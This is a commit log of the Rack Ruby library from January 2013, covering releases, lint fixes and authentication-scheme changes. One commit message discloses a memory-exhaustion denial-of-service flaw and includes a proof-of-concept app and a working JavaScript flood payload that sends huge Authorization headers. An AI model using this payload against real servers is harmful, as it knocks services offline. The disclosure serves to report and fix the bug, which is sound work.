
Jan 28, 2013

  1. James Tucker

    Fix ChangeLog generation on 1.9.3+

    authored January 28, 2013
  2. James Tucker

    Bump version and add release notes to README

    authored January 28, 2013
  3. James Tucker

    Merge pull request #500 from aocole/patch-1

    Changing incorrect documentation
    authored January 28, 2013
  4. James Tucker

    Remove specific version code from Lint

     * Too easy to miss during updates
     * Required format unchanged
     * Closes #501
    authored January 28, 2013
  5. James Tucker

    Reimplement keys and values on SessionHash

     * Basic additional APIs to simplify requirements for Rails and Devise
    authored January 28, 2013

Jan 25, 2013

  1. Andrew Cole

    Changing incorrect documentation

    The original comment on set_session said to return true or false
    depending on whether the session was saved or not. In reality, this
    method MUST return the session id in order for #commit_session to set
    the cookie data properly.
    authored January 24, 2013

Jan 22, 2013

  1. James Tucker

    Merge branch 'lint-headerhash' of git://bogomips.org/rack

    * 'lint-headerhash' of git://bogomips.org/rack:
      lint: avoid TypeError on non-Hash-like response headers
    authored January 22, 2013
  2. Konstantin Haase

    Merge pull request #499 from barttenbrinke/master

    Added specific test when X-Forwarded-For is 'unknown'
    authored January 22, 2013
  3. Bart ten Brinke

    Added spec for new Squid behaviour.

    authored January 22, 2013
  4. lint: avoid TypeError on non-Hash-like response headers

    According to SPEC (and check_headers), Response headers need only
    respond to #each.  Thus, check_hijack_response should rely on
    Rack::Utils::HeaderHash if it wishes to access the headers in a
    hash-like fashion.
    authored January 22, 2013
  5. James Tucker

    Update gemspec version, Rack 1.5.0

    authored January 21, 2013
  6. James Tucker

    Update README for 1.5.0 release

    authored January 21, 2013
  7. James Tucker

    Switch to RFC 2822 expires

    authored January 21, 2013

Jan 21, 2013

  1. James Tucker

    Fix a long standing misnomer for date formats

    References #414
    authored January 21, 2013
  2. James Tucker

    Use Dir.tmpdir instead of hardcoded /tmp

    Closes #492
    authored January 21, 2013
  3. James Tucker

    Don't modify the middleware hash in Rack::Server

     * Closes #498
    authored January 21, 2013
  4. James Tucker

    Merge pull request #496 from homakov/patch-3

    Remove never called string
    authored January 21, 2013

Jan 14, 2013

  1. Egor Homakov

    Remove never called string

    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
    authored January 14, 2013

Jan 13, 2013

  1. James Tucker

    Update to 1.5.0.beta.2

    authored January 13, 2013
  2. James Tucker

    Update README security notes

    authored January 13, 2013
  3. James Tucker

    Update README for release. Add security section.

    authored January 13, 2013
  4. James Tucker

    Rack::Auth::AbstractRequest#scheme returns strings

     * This is a breaking API change, but doesn't appear to be used in public
    authored January 13, 2013
  5. James Tucker

    Squash test warnings

    authored January 13, 2013
  6. James Tucker

    Turn warnings back on for basic test runs

    authored January 13, 2013
  7. James Tucker

    Squash warnings in spec_auth

    authored January 13, 2013
  8. James Tucker

    Reimplement auth scheme fix

     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc. are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - uses rails
     * Checked rack-authentication - does its own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does its own thing
     * Probably missed a bunch, but that'll have to do
    authored January 13, 2013
  9. James Tucker

    Revert "Merge pull request #494 from homakov/patch-2"

    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
    authored January 13, 2013
  10. Konstantin Haase

    Merge pull request #494 from homakov/patch-2

    Remove .to_sym in Authorization scheme
    authored January 13, 2013
  11. Egor Homakov

    Remove .to_sym in Authorization scheme

    Hello, `.to_sym` should never be applied to user input. Thus I recommend changing the `scheme` method:
    ```ruby
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send an enormous number of `Authorization` headers, we can make one as long as possible.
    This is a PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple JavaScript to DoS it:
    ```javascript
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run the JS, every request carries 18888890 letters in a symbol. This 'data' will never be garbage collected.
    Should it be fixed?
    authored January 13, 2013

Jan 11, 2013

  1. James Tucker

    Merge branch 'hijack'

    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
    authored January 11, 2013
  2. James Tucker

    Hijack SPEC changes after review discussion

    authored January 11, 2013
  3. James Tucker

    Add q-value helpers for Accept headers, etc.

     * Supersedes and closes #443
    authored January 11, 2013
  4. James Tucker

    Introduce Rack::Mime.match?, references #443

    authored January 11, 2013
  5. James Tucker

    Minor code review comments closing #451

     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
    authored January 11, 2013
  6. James Tucker

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    This reverts commit 3b24fa9.
    authored January 11, 2013